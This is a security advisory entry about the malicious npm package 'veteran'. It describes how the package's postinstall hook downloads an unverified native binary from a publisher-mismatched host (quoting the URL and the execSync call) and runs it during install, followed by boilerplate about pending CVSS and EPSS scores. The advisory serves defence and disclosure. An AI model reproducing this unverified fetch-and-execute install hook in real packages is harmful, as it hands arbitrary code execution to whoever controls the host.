Vulnerability
Malicious code in veteran (npm)
## Source: amazon-inspector (70a20dd9f8d6a9df01d766c25693711d90e4303e3c68fa371f0b842f83c485b4)

On `npm install`, the package's postinstall hook (`install.js`, registered via `package.json` line 10, `"postinstall": "node install.js"`) downloads a platform-specific executable from `https://laogou.us/download/veteran/v1.0.0/veteran_1.0.0_<platform>_<arch>.{tar.gz,zip}` (install.js:13, `const DOWNLOAD_BASE_URL = 'https://laogou.us/download/veteran'`), extracts it with the shell `tar`/`unzip` tools, sets mode 0o755 on it (install.js:165), and immediately executes it (install.js:170, `execSync("${BIN_PATH}" version",...)`). The download host `laogou.us` does not match the package's declared publisher/homepage (`github.com/yongjie0203/veteran`); the URL is pinned neither to a hash nor to a signature; no checksum or signature verification is performed on the fetched bytes; and source comments suggest the URL is meant to be swapped by future maintainers. The operator of `laogou.us` can therefore serve arbitrary native code to every installer, and those bytes run as the installing user during `npm install`. This matches the publisher-mismatched, unverified, mutable-host dropper pattern.
No CVSS base score from NVD or GHSA yet. NVD typically scores within 24–72 hours of publication; GHSA usually within a day for OSS-flagged CVEs. Last record update .
For interim severity, fall back on KEV / EXPLOIT signals and the EPSS percentile (lower panel). Re-check this CVE after one cron tick — the score lands automatically when the source publishes.
FIRST.org publishes EPSS daily. Coverage isn't universal — pre-disclosure CVEs and reserved IDs don't carry an EPSS score until at least one exploitation signal lands. Score will appear within 24 hours of the next EPSS pull.
No exploitation, limited impact or prevalence